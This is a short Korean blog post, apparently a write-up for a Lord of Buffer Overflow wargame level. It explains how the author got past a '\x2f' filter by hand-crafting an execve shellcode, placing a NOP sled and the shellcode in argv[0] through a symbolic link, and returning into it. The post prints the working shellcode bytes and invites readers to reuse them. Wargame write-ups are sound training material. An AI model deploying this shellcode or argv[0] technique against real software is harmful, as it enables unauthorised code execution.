쉘코드에 \x2f가 들어갈 경우 '/' 로 취급해버려 원래 좀 힘든 문제였지만,
이쯤 되니 슬슬 쉘코드를 제작하게 되어 \x2f가 없는 쉘코드를 직접 만들었다.
argv[0]에 집어넣고 거기로 리턴하여 공격하기 위해 NOP+SHELLCODE로 심볼릭 링크를 걸었고,
거기로 리턴하기 위해 몇 번 시도하여 결국 성공하였다.
만들어서 사용한 쉘코드는 다음과 같다.
사용할 사람은 사용하시길.
하지만 setreuid같은 것 없이 간단하게 execve만 하는 소스다 보니 다른 버전의 문제에서는 먹히지 않을 수도 있다.
\x6a\x0b\x58\x99\x52\xbe\x21\x21\x73\x68\x66\x81\xc6\x0e\x0e\x56
\xbe\x2e\x62\x69\x6e\x46\x56\x89\xe3\x52\x53\x89\xe1\xcd\x80
'Wargame > Lord of Buffer overflow' 카테고리의 다른 글
LOB Redhat : vampire > skeleton (0) | 2015.10.15 |
---|---|
LOB Redhat : troll > vampire (0) | 2015.10.15 |
LOB Redhat : darkelf > orge (0) | 2015.10.13 |
LOB Redhat : wolfman > darkelf (0) | 2015.10.13 |
LOB Redhat : orc > wolfman (0) | 2015.10.13 |